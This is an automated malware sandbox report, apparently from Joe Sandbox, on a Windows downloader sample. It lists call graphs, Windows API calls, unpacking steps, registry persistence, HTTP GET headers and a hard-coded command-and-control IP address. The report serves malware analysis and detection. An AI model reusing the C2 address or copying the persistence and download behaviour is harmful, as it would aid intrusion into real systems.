calls 31288->31291 31290 4069ba 31289->31290 31292 402390 39 API calls 31290->31292 31293 406857 31291->31293 31294 4069c5 31292->31294 31482 408250 53 API calls 2 library calls 31293->31482 31296 402390 39 API calls 31294->31296 31297 4069d0 31296->31297 31298 402390 39 API calls 31297->31298 31301 4069df 31298->31301 31299 406a3e Sleep 31299->31301 31300 402460 43 API calls 31300->31301 31301->31299 31301->31300 31302 406a47 31301->31302 31303 402390 39 API calls 31302->31303 31304 406a4f 31303->31304 31484 408c80 43 API calls 2 library calls 31304->31484 31306 406a60 31485 408c80 43 API calls 2 library calls 31306->31485 31308 406a79 31486 408c80 43 API calls 2 library calls 31308->31486 31310 406a8c 31487 404f70 130 API calls 6 library calls 31310->31487 31313 402830 31312->31313 31314 40277f 31312->31314 31330 401600 43 API calls 3 library calls 31313->31330 31315 40278b __InternalCxxFrameHandler 31314->31315 31317 4027b3 31314->31317 31319 4027f7 31314->31319 31320 4027ee 31314->31320 31315->30996 31328 401560 41 API calls 3 library calls 31317->31328 31318 402835 31331 401560 41 API calls 2 library calls 31318->31331 31327 4027cf __InternalCxxFrameHandler 31319->31327 31329 401560 41 API calls 3 library calls 31319->31329 31320->31317 31320->31318 31323 4027c6 31323->31327 31332 40cfef 31323->31332 31327->30996 31328->31323 31329->31327 31330->31318 31331->31323 31337 40cf2b 39 API calls ___std_exception_copy 31332->31337 31334 40cffe 31338 40d00c 11 API calls __CreateFrameInfo 31334->31338 31336 40d00b 31337->31334 31338->31336 31340 41085b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 31339->31340 31340->30999 31488 4128e2 GetLastError 31341->31488 31355 403af1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31344->31355 31348 403c33 31348->31007 31349 403b8d 31350 403bd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31349->31350 31351 403c37 31349->31351 31527 409a17 31350->31527 31353 40cfef 39 API calls 31351->31353 31352 403b75 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31352->31350 31352->31351 31535 408f80 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31352->31535 31354 403c3c 31353->31354 31355->31351 31355->31352 31534 408c80 43 API calls 2 library calls 31355->31534 31357 406c6c 31356->31357 31365 406c9e 31356->31365 31537 409cc5 6 API calls 31357->31537 31359 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31360 406cb0 31359->31360 31360->31009 31361 406c76 31361->31365 31538 409fd7 42 API calls 31361->31538 31363 406c94 31539 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31363->31539 31365->31359 31367 40239b 31366->31367 31368 4023b6 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31366->31368 31367->31368 31369 40cfef 39 API calls 31367->31369 31368->31013 31370 4023da 31369->31370 31371 402411 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 31370->31371 31372 40cfef 39 API calls 31370->31372 31371->31013 31373 40245c 31372->31373 31375 406f48 31374->31375 31376 406f0e 31374->31376 31377 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31375->31377 31540 409cc5 6 API calls 31376->31540 31380 406f5b 31377->31380 31379 406f18 31379->31375 31541 409fd7 42 API calls 31379->31541 31380->31015 31382 406f3e 31542 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31382->31542 31385 4017b3 __CreateFrameInfo 31384->31385 31543 409b8a 31385->31543 31387 4017ca __CreateFrameInfo 31387->31141 31389 40845e 31388->31389 31390 408422 31388->31390 31392 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31389->31392 31570 409cc5 6 API calls 31390->31570 31393 408470 31392->31393 31393->31151 31394 40842c 31394->31389 31571 409fd7 42 API calls 31394->31571 31396 408454 31572 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31396->31572 31399 40839c 31398->31399 31407 4083ce 31398->31407 31573 409cc5 6 API calls 31399->31573 31400 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31402 4083e0 31400->31402 31402->31174 31403 4083a6 31403->31407 31574 409fd7 42 API calls 31403->31574 31405 4083c4 31575 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31405->31575 31407->31400 31409 40830d 31408->31409 31417 408352 31408->31417 31576 409cc5 6 API calls 31409->31576 31410 409a17 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 31412 408365 31410->31412 31412->31200 31413 408317 31413->31417 31577 409fd7 42 API calls 31413->31577 31415 408348 31578 409c7b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 31415->31578 31417->31410 31419 408db4 31418->31419 31579 409310 31419->31579 31421 40690e 31422 408e00 31421->31422 31423 408e1b 31422->31423 31424 408e2f __InternalCxxFrameHandler 31423->31424 31585 402840 43 API calls 3 library calls 31423->31585 31424->31238 31586 409130 31426->31586 31428 40693b 31428->31245 31429->31024 31430->31031 31431->31037 31432->31049 31433->31059 31434->31096 31435->31095 31436->31096 31437->31025 31438->31041 31439->31052 31440->31062 31441->31077 31442->31093 31443->31096 31444->31144 31445->31188 31446->31040 31447->31065 31448->31079 31449->31099 31450->31118 31451->31140 31452->31161 31453->31182 31454->31217 31455->31229 31456->31270 31457->31064 31458->31101 31459->31121 31460->31148 31461->31165 31462->31187 31463->31211 31464->31100 31465->31147 31466->31169 31467->31191 31468->31215 31469->31233 31470->31254 31471->31146 31472->31194 31473->31219 31474->31236 31475->31259 31476->31279 31477->31196 31478->31239 31479->31264 31480->31275 31481->31288 31482->31279 31483->31115 31484->31306 31485->31308 31486->31310 31489 4128fe 31488->31489 31490 4128f8 31488->31490 31494 412902 31489->31494 31518 4135e5 6 API calls __dosmaperr 31489->31518 31517 4135a6 6 API calls __dosmaperr 31490->31517 31493 41291a 31493->31494 31495 412922 31493->31495 31496 412987 SetLastError 31494->31496 31519 413294 14 API calls __dosmaperr 31495->31519 31498 405aa8 Sleep 31496->31498 31499 412997 31496->31499 31498->31002 31526 411109 39 API calls __CreateFrameInfo 31499->31526 31500 41292f 31502 412937 31500->31502 31503 412948 31500->31503 31520 4135e5 6 API calls __dosmaperr 31502->31520 31521 4135e5 6 API calls __dosmaperr 31503->31521 31507 412945 31523 4132f1 14 API calls __dosmaperr 31507->31523 31508 412954 31509 412958 31508->31509 31510 41296f 31508->31510 31522 4135e5 6 API calls __dosmaperr 31509->31522 31524 412710 14 API calls __dosmaperr 31510->31524 31514 41296c 31514->31496 31515 41297a 31525 4132f1 14 API calls __dosmaperr 31515->31525 31517->31489 31518->31493 31519->31500 31520->31507 31521->31508 31522->31507 31523->31514 31524->31515 31525->31514 31528 409a20 IsProcessorFeaturePresent 31527->31528 31529 409a1f 31527->31529 31531 409a67 31528->31531 31529->31348 31536 409a2a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 31531->31536 31533 409b4a 31533->31348 31534->31355 31535->31349 31536->31533 31537->31361 31538->31363 31539->31365 31540->31379 31541->31382 31542->31375 31545 409b4c 31543->31545 31546 409b6b 31545->31546 31548 409b6d 31545->31548 31557 40fb4d 31545->31557 31566 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 31545->31566 31546->31387 31549 401560 Concurrency::cancel_current_task 31548->31549 31551 409b77 31548->31551 31564 40af80 RaiseException 31549->31564 31567 40af80 RaiseException 31551->31567 31552 40157c 31565 40ad31 40 API calls 2 library calls 31552->31565 31555 40a589 31556 4015a3 31556->31387 31562 413cb9 __dosmaperr 31557->31562 31558 413cf7 31569 40d0dd 14 API calls __dosmaperr 31558->31569 31560 413ce2 RtlAllocateHeap 31561 413cf5 31560->31561 31560->31562 31561->31545 31562->31558 31562->31560 31568 4116b2 EnterCriticalSection LeaveCriticalSection __dosmaperr 31562->31568 31564->31552 31565->31556 31566->31545 31567->31555 31568->31562 31569->31561 31570->31394 31571->31396 31572->31389 31573->31403 31574->31405 31575->31407 31576->31413 31577->31415 31578->31417 31580 409398 31579->31580 31583 40932a __InternalCxxFrameHandler 31579->31583 31584 4095d0 43 API calls 4 library calls 31580->31584 31582 4093aa 31582->31421 31583->31421 31584->31582 31585->31424 31587 409173 31586->31587 31588 4092fd 31587->31588 31589 40923d 31587->31589 31593 409178 __InternalCxxFrameHandler 31587->31593 31605 401600 43 API calls 3 library calls 31588->31605 31594 409272 31589->31594 31595 409298 31589->31595 31591 409302 31606 401560 41 API calls 2 library calls 31591->31606 31593->31428 31594->31591 31597 40927d 31594->31597 31602 40928a __InternalCxxFrameHandler 31595->31602 31604 401560 41 API calls 3 library calls 31595->31604 31596 409283 31599 40cfef 39 API calls 31596->31599 31596->31602 31603 401560 41 API calls 3 library calls 31597->31603 31601 40930c 31599->31601 31602->31428 31603->31596 31604->31602 31605->31591 31606->31596 31607 47a7cb9 31610 47a7cc4 31607->31610 31611 47a7cd3 31610->31611 31614 47a8464 31611->31614 31619 47a847f 31614->31619 31615 47a8488 CreateToolhelp32Snapshot 31616 47a84a4 Module32First 31615->31616 31615->31619 31617 47a7cc3 31616->31617 31618 47a84b3 31616->31618 31621 47a8123 31618->31621 31619->31615 31619->31616 31622 47a814e 31621->31622 31623 47a8197 31622->31623 31624 47a815f VirtualAlloc 31622->31624 31623->31623 31624->31623 31625 601ee4 LoadLibraryA 31626 6055ae 31625->31626 31627 603907 31628 605ba6 31627->31628 31629 605bd0 RegOpenKeyA 31628->31629 31630 605bf7 RegOpenKeyA 31628->31630 31629->31630 31631 605bed 31629->31631 31632 605c14 31630->31632 31631->31630 31633 605c58 GetNativeSystemInfo 31632->31633 31634 605c63 31632->31634 31633->31634 31635 704207 31636 7041a3 VirtualProtect 31635->31636 31638 70420e 31635->31638 31636->31638 31639 495003c 31640 4950049 31639->31640 31641 495004c 31639->31641 31655 4950e0f SetErrorMode SetErrorMode 31641->31655 31646 4950265 31647 49502ce VirtualProtect 31646->31647 31649 495030b 31647->31649 31648 4950439 VirtualFree 31653 49504be 31648->31653 31654 49505f4 LoadLibraryA 31648->31654 31649->31648 31650 49504e3 LoadLibraryA 31650->31653 31652 49508c7 31653->31650 31653->31654 31654->31652 31656 4950223 31655->31656 31657 4950d90 31656->31657 31658 4950dad 31657->31658 31659 4950dbb GetPEB 31658->31659 31660 4950238 VirtualAlloc 31658->31660 31659->31660 31660->31646

                        Executed Functions

                        Function 00403D40 Relevance: 57.8, APIs: 25, Strings: 7, Instructions: 1839sleepcomCOMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathA.KERNEL32(00000104,?,B6DBD0D4,75570F00,00000000), ref: 00403DAA
                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00403F39
                        • Sleep.KERNEL32(000003E8), ref: 00403F42
                        • __Init_thread_footer.LIBCMT ref: 00404517
                        • __Init_thread_footer.LIBCMT ref: 004046DD
                        • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 004048E7
                        • __Init_thread_footer.LIBCMT ref: 00404975
                        • __Init_thread_footer.LIBCMT ref: 00404BDE
                        • CoInitialize.OLE32(00000000), ref: 00404C5F
                        • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404C7A
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 00404CE8
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        • CoUninitialize.OLE32(?,00406AC1,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71,?,?,?,?,00000000,0042D9A0), ref: 00404D21
                        • CoUninitialize.OLE32(?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404DE4
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DB71,?,?,?,?,00000000,0042D9A0,0042D9A1), ref: 00404E65
                        • __Init_thread_footer.LIBCMT ref: 00404046
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                          • Part of subcall function 00402220: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402256
                          • Part of subcall function 00402220: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402277
                          • Part of subcall function 00402220: CloseHandle.KERNEL32(00000000), ref: 0040227E
                        • __Init_thread_footer.LIBCMT ref: 00404222
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$O@K\$SUB=$Y@BA$ZK\.$get$rmBK
                        • API String ID: 995133137-3578497191
                        • Opcode ID: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction ID: 6a8ba5f9be4b72ae1469cca8882757b6bc7ac7481bdf7cf44a4378d84f27710c
                        • Opcode Fuzzy Hash: ce9b54ea2defedab38e7e3161f400f5d63c440566f465774b986bf57360a8c7f
                        • Instruction Fuzzy Hash: 44F2DFB0E042549BDB24DF24DC48B9EBBB0EF45304F5442E9E5097B2D2DB78AA84CF59
                        Function 00404F70 Relevance: 45.4, APIs: 16, Strings: 9, Instructions: 1645sleepregistryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 498 404f70-405085 call 410822 call 4106e2 call 40b570 call 409b8a call 40b570 509 405090-40509b 498->509 510 4050e5-4050ec 509->510 511 40509d-4050b1 call 409cc5 509->511 513 40512d-405150 510->513 514 4050ee-405128 510->514 511->510 518 4050b3-4050e2 call 409fd7 call 409c7b 511->518 515 405153-405158 513->515 514->513 515->515 517 40515a-4051fc call 402760 call 409310 515->517 527 405211-40522c call 401e50 517->527 528 4051fe-405207 call 409a25 517->528 518->510 533 40525d-405285 527->533 534 40522e-40523d 527->534 528->527 535 4052b6-4052b8 533->535 536 405287-405296 533->536 537 405253-40525a call 409b7c 534->537 538 40523f-40524d 534->538 541 4052f0-4052fb Sleep 535->541 542 4052ba-4052cd 535->542 539 405298-4052a6 536->539 540 4052ac-4052b3 call 409b7c 536->540 537->533 538->537 543 4058dd-405982 call 40cfef RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 538->543 539->540 539->543 540->535 541->509 548 4052d0-4052d5 542->548 554 4059b0-4059c8 543->554 555 405984-405990 543->555 548->548 551 4052d7-4052e9 call 4024a0 548->551 551->541 561 4052eb-4052ee 551->561 559 4059f2-405a0a 554->559 560 4059ca-4059d6 554->560 557 405992-4059a0 555->557 558 4059a6-4059ad call 409b7c 555->558 557->558 562 405a42-405a47 call 40cfef 557->562 558->554 566 405a34-405a41 call 409a17 559->566 567 405a0c-405a18 559->567 564 4059e8-4059ef call 409b7c 560->564 565 4059d8-4059e6 560->565 561->541 568 405300-405389 call 40b570 call 409b8a call 40b570 561->568 564->559 565->562 565->564 574 405a2a-405a31 call 409b7c 567->574 575 405a1a-405a28 567->575 586 405390-4053a2 568->586 574->566 575->562 575->574 587 4053f3-4053fa 586->587 588 4053a4-4053b8 call 409cc5 586->588 589 4053fc-4053fe 587->589 590 40540d-405430 587->590 588->587 596 4053ba-4053f0 call 409fd7 call 409c7b 588->596 592 405400-40540b 589->592 593 405433-405438 590->593 592->590 592->592 593->593 595 40543a-4054dc call 402760 call 409310 593->595 605 4054f1-40550c call 401e50 595->605 606 4054de-4054e7 call 409a25 595->606 596->587 611 40553d-405565 605->611 612 40550e-40551d 605->612 606->605 615 405596-405598 611->615 616 405567-405576 611->616 613 405533-40553a call 409b7c 612->613 614 40551f-40552d 612->614 613->611 614->543 614->613 620 405693-40569c 615->620 621 40559e-4055a5 615->621 618 405578-405586 616->618 619 40558c-405593 call 409b7c 616->619 618->543 618->619 619->615 620->586 624 4056a2 620->624 621->620 625 4055ab-4055b3 621->625 627 405775-4057d9 call 409a25 * 3 CoUninitialize call 409a25 * 3 CoUninitialize 624->627 628 4055b9-4055bc 625->628 629 40568d 625->629 657 405807-40580d 627->657 658 4057db-4057e7 627->658 628->629 631 4055c2-4055ea call 40fb4d 628->631 629->620 636 4055f0-405602 call 40aff0 631->636 637 4055ec-4055ee 631->637 639 405605-40565c call 40fb4d call 408c80 call 4035d0 call 402ee0 636->639 637->639 639->629 664 40565e-405669 call 403430 639->664 662 40583b-405853 657->662 663 40580f-40581b 657->663 660 4057e9-4057f7 658->660 661 4057fd-405804 call 409b7c 658->661 660->543 660->661 661->657 665 405855-405861 662->665 666 40587d-405895 662->666 668 405831-405838 call 409b7c 663->668 669 40581d-40582b 663->669 664->629 679 40566b-405679 call 403430 664->679 673 405873-40587a call 409b7c 665->673 674 405863-405871 665->674 675 405897-4058a3 666->675 676 4058bf-4058dc call 409a17 666->676 668->662 669->543 669->668 673->666 674->543 674->673 681 4058b5-4058bc call 409b7c 675->681 682 4058a5-4058b3 675->682 676->543 679->629 690 40567b-40568b call 403430 679->690 681->676 682->543 682->681 690->629 693 4056a7-4056bc 690->693 694 4056c2-4056ef 693->694 696 4056f1-4056fd 694->696 697 405703-405706 694->697 696->697 698 405708-405715 697->698 699 40571b-40571e 697->699 698->699 700 405720-405723 699->700 701 40572d-405730 699->701 702 405732-405734 700->702 703 405725-40572b 700->703 701->702 704 40573b-405762 Sleep 701->704 702->704 705 405736-405739 702->705 703->702 704->694 706 405768 704->706 705->704 707 40576a-40576f Sleep 705->707 706->627 707->627
                        APIs
                          • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,B6DBD0D4), ref: 00410837
                          • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004050DD
                        • Sleep.KERNEL32(00000BB8,00000000,?,00406AA1,0041D8D0,0042DBDC,0042DBDD), ref: 004052F5
                        • __Init_thread_footer.LIBCMT ref: 004053EB
                        • Sleep.KERNEL32(000007D0), ref: 00405755
                        • Sleep.KERNEL32(000007D0), ref: 0040576F
                        • CoUninitialize.OLE32(?,?,0042DC19,?,?,?,?,?,?,?,?,?,?,00000000,0042DBDD), ref: 004057A5
                        • CoUninitialize.OLE32(?,?,?,?,?,0042DC19,?,?,?,?,?,?,?), ref: 004057D1
                        • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                        • Sleep.KERNEL32(000003E8), ref: 00405AB0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                        • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                        • API String ID: 606935701-1501174972
                        • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                        • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                        • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99
                        Function 047A8464 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1492 47a8464-47a847d 1493 47a847f-47a8481 1492->1493 1494 47a8488-47a8494 CreateToolhelp32Snapshot 1493->1494 1495 47a8483 1493->1495 1496 47a8496-47a849c 1494->1496 1497 47a84a4-47a84b1 Module32First 1494->1497 1495->1494 1496->1497 1503 47a849e-47a84a2 1496->1503 1498 47a84ba-47a84c2 1497->1498 1499 47a84b3-47a84b4 call 47a8123 1497->1499 1504 47a84b9 1499->1504 1503->1493 1503->1497 1504->1498
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 047A848C
                        • Module32First.KERNEL32(00000000,00000224), ref: 047A84AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.3842703347.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateFirstModule32SnapshotToolhelp32
                        • String ID:
                        • API String ID: 3833638111-0
                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction ID: 5dc7c83e20f23cc8e33816e0c8d348b8f7c13a94c26d9eda38bb56e96fa06e4a
                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                        • Instruction Fuzzy Hash: 8DF09635100711AFE7203FF59C8CB6EB6E8BF89725F110728E642952C0DB74F8554AA2
                        Function 004087E0 Relevance: 2.5, Strings: 2, Instructions: 26COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1508 4087e0-408807 call 402460 * 2 call 405a50 1514 40880c-408816 call 4106ab 1508->1514
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID: mixtwo$nosub
                        • API String ID: 3472027048-187875987
                        • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                        • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                        • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF
                        Function 00704171 Relevance: 1.6, APIs: 1, Instructions: 150memoryCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,0070416D,00000004), ref: 007041E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841360909.0000000000703000.00000040.00000001.01000000.00000003.sdmp, Offset: 00703000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_703000_file.jbxd
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 4c760690aba9c4166c12dedabc6f8366dcbee658cbc4482b9cef41ae9e626e8d
                        • Instruction ID: e26c689e6d203fd96d15a37bcb9031de1892486aa88c12c73133c230c7f0310d
                        • Opcode Fuzzy Hash: 4c760690aba9c4166c12dedabc6f8366dcbee658cbc4482b9cef41ae9e626e8d
                        • Instruction Fuzzy Hash: 1A416DF600C28AFEE705CF2499047FE7BE9EF96330F344619FA418A982D2694C549B25
                        Function 00401830 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 106networkCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                          • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                        • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                        Strings
                        • text, xrefs: 00401B8F
                        • http://, xrefs: 00401EF4, 004021D3
                        • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                        • GET, xrefs: 004020E7
                        • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                        • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                        • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.3841293925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                        • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                        • API String ID: 2146599340-4172842843
                        • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                        • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                        • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4
                        Function 0495003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 728 495003c-4950047 729 495004c-4950263 call 4950a3f call 4950e0f call 4950d90 VirtualAlloc 728->729 730 4950049 728->730 746 4950265-4950289 call 4950a69 729->746 747 495028b-4950292 729->747 733 495004a 730->733 733->733 752 49502ce-49503c2 VirtualProtect call 4950cce call 4950ce7 746->752 749 49502a1-49502b0 747->749 751 49502b2-49502cc 749->751 749->752 751->749 758 49503d1-49503e0 752->758 759 49503e2-4950437 call 4950ce7 758->759 760 4950439-49504b8 VirtualFree 758->760 759->758 761 49505f4-49505fe 760->761 762 49504be-49504cd 760->762 765 4950604-495060d 761->765 766 495077f-4950789 761->766 764 49504d3-49504dd 762->764 764->761 771 49504e3-4950505 LoadLibraryA 764->771 765->766 772 4950613-4950637 765->772 769 49507a6-49507b0 766->769 770 495078b-49507a3 766->770 773 49507b6-49507cb 769->773 774 495086e-49508be LoadLibraryA 769->774 770->769 775 4950517-4950520 771->775 776 4950507-4950515 771->776 777 495063e-4950648 772->777 778 49507d2-49507d5 773->778 781 49508c7-49508f9 774->781 779 4950526-4950547 775->779 776->779 777->766 780 495064e-495065a 777->780 782 4950824-4950833 778->782 783 49507d7-49507e0 778->783 784 495054d-4950550 779->784 780->766 785 4950660-495066a 780->785 786 4950902-495091d 781->786 787 49508fb-4950901 781->787 793 4950839-495083c 782->793 788 49507e4-4950822 783->788 